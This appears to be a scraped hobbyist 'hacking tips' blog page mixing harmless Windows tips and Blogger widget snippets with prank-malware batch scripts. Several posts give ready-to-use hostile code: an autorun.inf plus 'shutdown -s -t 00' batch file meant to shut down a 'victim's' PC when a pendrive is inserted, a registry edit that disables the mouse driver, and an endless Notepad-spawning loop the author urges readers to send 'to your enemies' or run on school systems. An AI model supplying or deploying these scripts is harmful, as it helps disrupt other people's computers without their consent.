How To Save Web Page To PDF File .

By // No comments:
Also Check :--

How to "Delete administrator Password" without any..Software.
How to make your Adobe reader to speak 
Windows Shorcut Key 
How To Shutdown Computer Using Pendrive 


1. Open the Google Chrome Browser on your PC or MAC 

2. Then go to the web page that you want to convert as a PDF. 

3. Now press CTRL+P on Windows PC or Command+P if you are on a Mac to Open the the Print dialog on Chrome Browser. 

4. Now Change the destination to “Save As PDF” and hit the save button.

How To check PC configuration

By // 1 comment:

How To Change Ip Address.

By // No comments:
 Hello Friends..
Now You Can Change Your Ip Address..


1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok

You should now be at an MSDOS prompt screen.

4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"

You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.

8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again

You should now be back to the "Local Area Connection" screen.

15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
tongue.gif 18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address

Tnx.......

How to make your Adobe reader to speak

By // No comments:
Step 1>>Open Adobe Reader

Step 2>>  --------------------------------Press----------------

Ctrl+shift+b (to hear the whole file)

Ctrl+shift+v (to hear the present page).

---------------------------------

Windows Shorcut Key

By // No comments:
Windows Shorcut Key
 Display or hide the Start menu WIN Key
Display the System Properties dialog box. WIN Key+BREAK
Show the desktop. WIN Key+D
Minimize all windows. WIN Key+M
Restores minimized windows. WIN Key+Shift+M
Open My Computer. WIN Key+E
Search for a file or folder. WIN Key+F
Search for computers. CTRL+WIN Key+F
Display Windows Help. WIN Key+F1
Lock your computer WIN Key+ L
Open the Run dialog box. WIN Key+R
Open Utility Manager. WIN Key+U

How To Change Window XP password using cmd

By // No comments:
How To Change Window XP password using cmd

Step 1 >>Start-> Run
Step 2>>Open Cmd
Step 3>>Type "net user "
Step 4>>ENTER
-Ask for New Password
-Give Password Which you Want -Twice ENTER

Now Your Password Has been Changed..

Start Your Mouse Using Notepad

By // No comments:
Start Your Mouse Using Notepad

Step 1>> Open Notepad
Step 2>>Copy This Code 
========================================================================
 @echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 1

=========================================================================
Step  3>> Paste It.
Step  4>>Save as Mouse.bat   (.bat is Must)
Now Run This File ...

Note:- For Stop Your Mouse Read it <<Stop Your Mouse Using Notepad>>

Stop Your Mouse Using Notepad

By // No comments:
Stop Your Mouse Using Notepad

Step 1>> Open Notepad
Step 2>>Copy This Code 
========================================================================
 @echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4

=========================================================================
Step  3>> Paste It.
Step  4>>Save as Mouse.bat   (.bat is Must)
Now Run This File ...

Note:- For Start Your Mouse Read it <<Start Your Mouse Using Notepad>>

How To Add A Visitor Counter in Website or Blog.

By // No comments:

How To Add A Visitor Counter in Website or Blog.

Step 1>> Open Bloger
Step 2>> Go To Layout
Step 3>>Add A Gadget (Html/java)
Step 4>>Copy This Code

<!-- hitwebcounter Code START -->
<a href="http://www.besthacker.in/" target="_blank">
<img src="http://hitwebcounter.com/counter/counter.php?page=5012778&style=0038&nbdigits=7&type=page&initCount=10000" title="678 digits" Alt="678 digits"   border="0" >
</a><br/>
<!-- Besthacker.in --><a href="http://www.besthacker.in/" title="Visitors Counter"
target="_blank" style="font-family: Arial, Helvetica, sans-serif;
font-size: 10px; color: #6E6A68; text-decoration: none ;"><em>Visitors Counter</em>
</a>  
 
Step 5>>Add it.  

How To Shutdown Computer Using Pendrive

By // 12 comments:
In this post i will help you to make the virus to make the system turned off whenever pen drive is inserted.
Also Read :--
Learn How To Make A Dangerous Virus Using Notepad....
How To Disable Hard Disk Of A Computer or Laptop.....
How to Delete Windows
How To Change Ip Address.

Step 1:>>copy this  code into notepad:

@echo off
shutdown -s -t 00

Save as fun.bat extension (for eg: clickme.bat).

Step 2:
      Now open the notepad and copy this code:

[autorun]
Open=filename.bat
Action=Mouse Disable

   Save it as "autorun.inf"


//don't forget to change the "filname.bat" with your filname.bat.
Step 3:
         Then copy the two files in your pen drive or victim's pen drive.

That's all whenever the victim insert his pen drive,the system will be turned off automatically.
    want any help ? or want to say thanks comment here


Also Read :-
Start Your Mouse Using Notepad
Stop Your Mouse Using Notepad
How to "Delete administrator Password" without any...

How To Add A Song In Website or Blogs Background.

By // 1 comment:
How To Add A Song In  Website Background. When Website Open The Song Will be Playing.

Step 1>>Open Blog.
Step 2>>Go To Layout
Step 3>> Add A Gadget (Html/Java)
Step 4 >> Copy This Code

<audio controls="controls"><source src="www.besthacker.in" autoload="true" autoplay="true" hidden="true" type="audio/mp3" /></source></audio>

Note:-Change The Source Add . Of The Song.

How To Open Notepad Continuously

By // No comments:
How To Open Notepad Continuously.

Step 1 >> Open Notepad.
Step 2 >> Copy This Code.

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


Step 3>> Paste It.
Step 4>> Save As Notepad.bat(.Bat is Must)


Now double clicking the file will open the notepad continuously.

Try this in your college or school system.

Or send to your enemies.

How To Open Multiple Websites Using Notepad

By // No comments:
How To Open Multiple Websites Using Notepad

Step 1:>> Open Notepad
Step 2 >> Copy This Code.

@echo off
start www.besthacker.in/
start www.google.com
start www.facebook.com


Step 3>> Paste It..
Step 4>> Save As Hacker.Bat(.bat is Must)

How To Add Flying Bird In Blogger Or Website For Twitter

By // No comments:
How To Add Flying Bird In Blogger Or Website For Twitter

Step 1 >> Open Blogger
Step 2 >> Go To Layout
Step 3 >> Add A Gadget (Html/Java)
Step 4 >> Copy This Code.
--------------------------------------------------------------------------------------------------------------
<script type="text/javascript" src="http://makingdifferent.github.com/blogger-widgets/Making Different-kama humaha.js"></script><script type="text/javascript">
var twitterAccount = "deepakkanyan2";
var tweetThisText = "Learn How To Hack any Thing..";
tripleflapInit();
</script><noscript><span style="font-size:11px;">Flying Twitter Bird Widget By <a href="http://www.deep.co.nf">Best Hacker <deep kanyan></deep></a></span></noscript>

See more at: http://www.besthacker.in
----------------------------------------------------------------------------------------------------------------------
Step 5>>Paste This Code.
Step 6>>Enter Your Twitter Id .Where I Entered deepakkanyan2

How To Add Go To Top In A Website Or Blogger.

By // No comments:
How To Add Go To Top In A Website Or Blogger.


For Blogger

Step 1 >> Open Blogger
Step 2 >> Go To Layout
Step 3 >> Add A Gadget (Html/Java)
Step 4 >> Copy This Code.
--------------------------------------------------------------------------------------------------------------
<!--BACK TO TOP STARTS-->
<a rel="nofollow" style="display:scroll;position:fixed;bottom:10px;right:5px;" href="#" title="Back to Top"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeVg2Hmo6fQ6NWrrPOMaFHpbRFB5xML-ejQ_tBnR8KCYVSJLx4hYn3icgjoG7SrrHR_gMyZamBMZtpmOjUAH8uzYjJ5sEZoIi9-dZvQ2PL4o0ViN63iKxlxQRMYV7cs6KuyKAE_UG0b6Y/s1600/Back-to-top.png "/></a>
<!--BACK TO ENDS--> - See more at: http://www.besthacker.in

----------------------------------------------------------------------------------------------------------------------
Step 5>>Paste This Code.
Step 6>>Save It.